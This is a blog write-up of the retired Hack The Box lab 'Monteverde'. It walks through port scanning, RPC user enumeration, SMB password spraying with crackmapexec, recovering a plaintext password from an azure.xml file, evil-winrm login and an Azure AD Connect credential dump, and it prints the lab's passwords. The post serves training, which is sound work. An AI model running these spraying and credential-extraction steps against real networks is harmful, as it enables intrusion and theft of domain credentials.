Posted inCTF HTB Retired

Hackthebox Monteverde Writeup

June 13, 20202 Comments
Hackthebox Monteverde Writeup
Hackthebox Monteverde Writeup
Tweet
Share
Share
Pin
0 Shares
4.8
(5)

Introduction

Hackthebox Monteverde Writeup

Here is the writeup of moteverde which is a Fun Box from Hackthe box.

Machine Name Monteverde
Difficulty Medium
Points30
Creator egre55

It is a great box from Hackthebox it starts with rpc enumeration followed by the brute forcing of smb login.For the privilege escalation DC sync attack was the easy way.

Lessons learnt 

1-Basic port Scan
2-Rpc enumeration
3-Smb enumeration 
4-Brruteforcing smb login
5-DCsync attack

Steps involved 

1-Port Scan
2-Enumerating smb
3-Getting user name via rpcclient 
4-Checking for PASS-THE-TICKET ATTACK.
5-Bruteforcing smb login
6-Getting password for mhope
7-Getting user flag
8-Checking groups of mhope
9-Performing DCsync attack 
10-Getting root flag

Commands involved 

1-nmap -Pn -sC -sV -v -oN nmap 10.10.10.172
2-smbclient -L //10.10.10.172
3-rpcclient //10.10.10.172 -U ""
4-crackmapexec smb 10.10.10.172 -u users -p users
5-smbclient \\10.10.10.172\users$ -U "SABatchJobs"
6-evil-winrm -i 10.10.10.172 -p 4n0therD4y@n0th3r$ -u mhope
7-whoami /all
8-import-module ./Azure-ADConnect.ps1
9-Azure-ADConnect -server 127.0.0.1 -db ADSync

Port Scan

➜ Monteverde cat nmap
Nmap 7.80 scan initiated Fri Jun 12 20:11:37 2020 as: nmap -Pn -sC -sV -v -oN nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.52s latency).
Not shown: 993 filtered ports
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-13 02:27:45Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Jun 12 20:16:24 2020 -- 1 IP address (1 host up) scanned in 286.56 seconds

By looking at the ports it looks like it is active directory machine.

Active Directory

Active Directory (AD) is a Microsoft technology used to manage computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers.

Active Directory allows network administrators to create and manage domains, users, and objects within a network. For example, an admin can create a group of users and give them specific access privileges to certain directories on the server. As a network grows, Active Directory provides a way to organize a large number of users into logical groups and subgroups, while providing access control at each level.

Enumerating smb

So I like to start with the smbclient to enumerate the smb shares.

➜ Monteverde smbclient -L //10.10.10.172
Enter WORKGROUP\nagendra's password:
Anonymous login successful
Sharename Type Comment --------- ---- -------
SMB1 disabled -- no workgroup available

The anonymous login was successful but i was not able to list the shares .So I tried with smbmap .

➜ Monteverde smbmap -u "" -H 10.10.10.172
[+] IP: 10.10.10.172:445 Name: 10.10.10.172

Getting user names via rpcclient

But no luck.So now let’s try to enumerate users with the help of rpcclient.

We can also do the same process with enum4linux.We will also see that afterwards .

➜ Monteverde rpcclient //10.10.10.172 -U ""
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

But if you are new then you can use enum4linux .But it is very old tool.

Hackthebox Monteverde Writeup

This is how enum4linux works .We can get the user names from enum4linux also.By automating the process.

Hackthebox Monteverde Writeup

Checking for PASS-THE-TICKET ATTACK.

The reason I am concerned about the user names is because port 88 (kerbose) is open.And we can try PASS-THE-TICKET ATTACK.

PASS-THE-TICKET ATTACK.

In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on a system and then use this on another system to request Kerberos service tickets (TGS) to gain access to network resources. 

So I used GetNPUsers from impacket.

Hackthebox Monteverde Writeup

Bruteforcing Smb login

This didn’t work so now I thought to bruteforce the smb login .So I tried to login with user name as the password .

For this you can use metasploit module auxiliary/scanner/smb/smb_login

When I first did it I used metasploit but now i will be using crackmapexec.

➜ Monteverde crackmapexec smb 10.10.10.172 -u users -p users
Hackthebox Monteverde Writeup

At last I got on valid credentials

Hackthebox Monteverde Writeup

So now let’s see which shares can we read.

Hackthebox Monteverde Writeup

Let’s see the azure uploads first.

Hackthebox Monteverde Writeup

But nothing inside it.

Getting password for mhope

I got something interesting in the users$ share.

smb: > recurse on
smb: > prompt off
smb: > mget *
Hackthebox Monteverde Writeup

We got a file azure.xml.

➜  mhope cat azure.xml 
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>%

And it contained the credentials of mhope user.

mhope:4n0therD4y@n0th3r$

Getting user flag

Let’s login through evil-winrm 

➜ Monteverde evil-winrm -i 10.10.10.172 -p 4n0therD4y@n0th3r$ -u mhope
Hackthebox Monteverde Writeup

After login into mhope account we got the user flag.

Checking groups of mhope

So now let’s move towards privilege escalation.

Evil-WinRM PS C:\Users\mhope\Documents> whoami /all
Hackthebox Monteverde Writeup

Checking the Groups . mhope belongs to the Azure admin group .

Performing DCsync attack

We can perform DC sync attack here.

What is DCSync?

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication. Once an attacker has access to a privileged account with domain replication rights, the attacker can utilize replication protocols to mimic a domain controller. 

For more information visit the blog.

We will perform it using a script which I got on github.

Hackthebox Monteverde Writeup
Evil-WinRM PS C:\Users\mhope\Documents> import-module ./Azure-ADConnect.ps1
Evil-WinRM PS C:\Users\mhope\Documents> Azure-ADConnect -server 127.0.0.1 -db ADSync
Hackthebox Monteverde Writeup

Got the credentials for administrator .

administrator:d0m@in4dminyeah!

Getting root flag

Thanks for reading Have a nice day

How useful was this post?

Click on a star to rate it!

Average rating 4.8 / 5. Vote count: 5

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 151
Tags:
Last updated on November 12, 2020

2 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *